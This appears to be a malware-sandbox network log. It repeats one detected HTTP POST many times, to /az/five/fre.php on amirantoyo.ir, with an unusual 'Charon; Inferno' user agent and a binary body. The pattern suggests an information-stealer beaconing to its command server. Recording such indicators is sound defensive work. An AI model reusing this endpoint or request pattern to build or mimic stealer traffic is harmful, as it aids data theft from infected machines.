Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
